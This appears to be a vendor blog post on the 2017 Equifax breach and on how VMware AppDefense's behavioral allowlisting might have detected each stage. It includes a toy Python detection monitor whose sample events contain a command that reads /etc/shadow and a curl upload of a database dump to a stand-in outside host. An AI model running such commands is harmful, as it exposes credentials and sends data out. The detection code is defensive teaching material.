On September 7, 2017, Equifax, one of the “big three” U.S. credit bureaus, announced one of the most high-profile data breaches in recent memory. The attack is estimated to have affected 143 million Americans through the loss of confidentiality of victims’ Social Security numbers, birth dates, and driver’s license numbers.
Since then, further compromises of Equifax data have been reported: roughly 200,000 stolen credit card records, PII stolen on 693,665 UK residents, spyware served from an Equifax credit-assistance site, exploitation of Equifax’s TALX payroll division, and more.
The August 2018 report by the U.S. Government Accountability Office, “Data Protection: Actions Taken by Equifax and Federal Agencies in Response to the 2017 Breach” (GAO-18-559), reveals new details about the sequence of the breach and the steps that could have been taken to prevent or detect it.
In this short write-up, we’ll walk through the stages of the 2017 Equifax breach and explore how IT teams might proactively observe (detect) and engage (mitigate or block) similar attack vectors using VMware AppDefense.
Shrinking the attack surface with VMware AppDefense
VMware AppDefense is an application behavioral whitelisting solution that helps customers build a compute least-privilege security model for data center endpoints and provides automated detection, response, and remediation for security events. AppDefense focuses on “ensuring good” rather than “chasing bad”: when we concentrate on what a workload is supposed to be doing, malicious activity stands out as a deviation from that intended state, and the exploitable attack surface of the workload shrinks to the behavior we have explicitly allowed.
Anatomy of a Breach
The following diagram presents the main steps that took place in the Equifax breach.
In March 2017, a new Apache Struts 2 vulnerability was published (CVE-2017-5638, an OGNL injection in the Jakarta Multipart parser triggered through a crafted Content-Type header). Exploiting it gives an attacker the ability to execute arbitrary commands on the vulnerable system.
From Equifax’s logs, it appears that on March 10, 2017, unidentified individuals scanned Equifax’s public servers and determined that some of them (e.g. the online dispute portal servers) were vulnerable. It is not known whether the unidentified individuals executed commands at that time, but it is reported that no data was taken.
According to Equifax, a couple of months later, on May 13, 2017, another incident occurred, resulting in unauthorized access to the online dispute portal.
From Equifax’s logs, it appears that once the attackers had code execution on the online dispute portal servers, they began harvesting those servers for credentials and issuing queries to other database servers in search of sensitive information. With these actions, the attackers expanded their foothold from the 3 servers of the dispute portal to 51 databases, most of them unrelated to the online dispute portal.
Over the roughly 76 days the attack lasted, the attackers executed approximately 9,000 database queries to retrieve PII, ran numerous commands (credential scraping, log cleaning, reconnaissance, and more), and used standard encrypted web protocols to disguise the exfiltration as normal network traffic (the GAO report notes that this traffic went uninspected because a certificate on the device inspecting encrypted traffic had expired some ten months earlier).
A Different Approach
When we analyze the tasks the attackers performed during the breach, many of them are exactly the deviations that a least-privilege security model for workloads is designed to expose. This is the approach VMware AppDefense takes. Let’s examine how AppDefense might have helped detect and/or block each of these symptoms.
New Binary Detection
To perform actions like credential scraping, communication with remote database servers, and exfiltration, the attackers would have needed tooling on the Equifax servers, which means staging and executing binaries that were not part of the application. The execution of such unknown binaries would have deviated from the known-good behavior AppDefense maintains for the workload, and those deviations would have generated high-fidelity alarms. Moreover, AppDefense could have blocked the execution of those binaries outright, closing this attack vector.
New Execution Pattern Detection
The report does not say whether the attackers downloaded their tools to the servers or leveraged existing OS capabilities to build what they needed on demand (so-called “fileless” or “living off the land” techniques, similar to those documented under ATT&CK T1127). The previous section covered the case of tools being dropped onto the attacked servers. For the fileless case, AppDefense addresses this vector by monitoring not only which binary executes but the full command line, including its parameters. Using machine learning and statistical analysis of the parameters with which a process is invoked, AppDefense can recognize an unknown execution pattern and stop the command from running, even when the binary itself is one the workload normally uses.
New Network Behavior Detection
The report states that the attackers performed at least three types of network activity. The first was lateral reconnaissance to find new targets (in this attack, 51 database servers belonging to different services were breached). The second was querying those servers to retrieve the PII, and the third was exfiltrating the gathered data out of Equifax’s network.
As with process execution, AppDefense learns and keeps the “known good” network behavior for each allowed executable, recording source, destination, and protocol information. Each of the three communication types described above would therefore appear as new network behavior on the server, which AppDefense would detect and could stop. Lateral reconnaissance, lateral movement, data gathering, and exfiltration become much harder for attackers to carry out unnoticed: they trigger alarms and can be blocked.
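To make the three detection types above concrete, here is a small behavioral allowlisting monitor written for this write-up. It is an added illustration, not AppDefense code and not a VMware API: a baseline records what may run on a workload (binary allowlist), how each binary may be invoked (command-line patterns, matched with simple globs in place of the statistical learning the product performs), and which network flows each binary may open (protocol, destination network, port). A stream of constructed process and connection events, modelled on the breach narrative, is evaluated against that baseline; everything the baseline does not cover is reported as a deviation. All hostnames, paths, networks, and ports in the example are invented.

```python
"""Toy behavioral allowlisting monitor.

Constructed example for this write-up; it is not AppDefense code and does not
use any VMware API.  A baseline records, for one workload, what may execute
(binaries), how it may be invoked (command-line patterns), and which network
flows each binary may open.  Every event the baseline does not cover is a
deviation, classified as one of the three detection types discussed above.
"""
import fnmatch
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    proto: str      # "tcp" or "udp"
    dst_net: str    # CIDR of permitted destinations
    dst_port: int


@dataclass
class Baseline:
    binaries: set   # "Who": binaries allowed to run on the workload
    cmdlines: dict  # "How": binary -> list of allowed command-line globs
    flows: dict     # "What": binary -> list of allowed Flow objects


def check_exec(baseline, binary, cmdline):
    """Classify a process-start event. Returns (verdict, reason)."""
    if binary not in baseline.binaries:
        return "BLOCK", "new_binary"
    allowed = baseline.cmdlines.get(binary, [])
    # The full command line is matched, so parameters matter: a known binary
    # invoked with unexpected arguments (living off the land) is a deviation.
    if not any(fnmatch.fnmatchcase(cmdline, pat) for pat in allowed):
        return "BLOCK", "new_execution_pattern"
    return "ALLOW", None


def check_connect(baseline, binary, proto, dst_ip, dst_port):
    """Classify an outbound-connection event. Returns (verdict, reason)."""
    if binary not in baseline.binaries:
        return "BLOCK", "new_binary"
    ip = ipaddress.ip_address(dst_ip)
    for flow in baseline.flows.get(binary, []):
        if (flow.proto == proto and flow.dst_port == dst_port
                and ip in ipaddress.ip_network(flow.dst_net)):
            return "ALLOW", None
    return "BLOCK", "new_network_behavior"


def evaluate(baseline, events):
    """Run event dicts through the baseline; return (reason, binary, detail) tuples."""
    alerts = []
    for ev in events:
        if ev["type"] == "exec":
            verdict, reason = check_exec(baseline, ev["binary"], ev["cmdline"])
            detail = ev["cmdline"]
        else:
            verdict, reason = check_connect(baseline, ev["binary"], ev["proto"],
                                            ev["dst_ip"], ev["dst_port"])
            detail = f'{ev["proto"]}://{ev["dst_ip"]}:{ev["dst_port"]}'
        if verdict == "BLOCK":
            alerts.append((reason, ev["binary"], detail))
    return alerts


# Hypothetical baseline for a dispute-portal application server
# (paths, networks and ports are invented for the example).
PORTAL_BASELINE = Baseline(
    binaries={"/usr/bin/java", "/bin/sh", "/usr/bin/curl"},
    cmdlines={
        "/usr/bin/java": ["/usr/bin/java -jar /opt/portal/portal.war*"],
        "/bin/sh": ["/bin/sh /opt/portal/bin/rotate-logs.sh"],
        "/usr/bin/curl": ["/usr/bin/curl -s http://127.0.0.1:8080/health"],
    },
    flows={
        # the portal may only talk to its own database subnet
        "/usr/bin/java": [Flow("tcp", "10.10.1.0/24", 1521)],
        "/usr/bin/curl": [Flow("tcp", "127.0.0.1/32", 8080)],
    },
)

# Constructed events: normal activity first, then command execution through
# the exploited web app, a dropped tool, a pivot to an unrelated database,
# and exfiltration over HTTPS using a tool already present on the host.
SAMPLE_EVENTS = [
    {"type": "exec", "binary": "/usr/bin/java",
     "cmdline": "/usr/bin/java -jar /opt/portal/portal.war --port 8080"},
    {"type": "conn", "binary": "/usr/bin/java", "proto": "tcp",
     "dst_ip": "10.10.1.15", "dst_port": 1521},
    {"type": "exec", "binary": "/bin/sh", "cmdline": "/bin/sh -c cat /etc/shadow"},
    {"type": "exec", "binary": "/tmp/.x/scan", "cmdline": "/tmp/.x/scan 10.20.0.0/16"},
    {"type": "conn", "binary": "/usr/bin/java", "proto": "tcp",
     "dst_ip": "10.20.5.7", "dst_port": 1521},
    {"type": "exec", "binary": "/usr/bin/curl",
     "cmdline": "/usr/bin/curl -T /tmp/dump.sql https://203.0.113.10/up"},
]

if __name__ == "__main__":
    for alert in evaluate(PORTAL_BASELINE, SAMPLE_EVENTS):
        print(alert)
```

Running the sample produces four deviations and no alert for the two legitimate events: the shell spawned with an unexpected command line and the curl upload are new execution patterns, the binary under /tmp is a new binary, and the Oracle connection to a subnet outside the portal’s own is new network behavior. Two caveats a practitioner would apply: the baseline must be learned over a representative period (deployments, log rotation, health checks) before switching from alert to block, or the control breaks the application it protects; and the command-line patterns should be as tight as the workload allows, since an attacker who can make a call look like an allowed invocation is not caught by this layer.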
Unlike other PII data breaches, where changing passwords or issuing a new credit card resolves most of the risk, the effects of the Equifax breach will haunt us for many years. Despite multiple layers of security controls, new and more sophisticated attacks are developed every day, and companies cannot keep up by “chasing bad”. VMware AppDefense addresses this problem with a different approach: it leverages VMware’s position in the virtualization layer to understand what an application was provisioned and intended to do, and then monitors the workload against that intended state. By defining Who (which binaries) may execute, How (which execution patterns) they may be invoked, and What (which network behavior) a running process may perform, AppDefense applies its fundamental approach to security, in this example reducing the attack surface by “ensuring good”.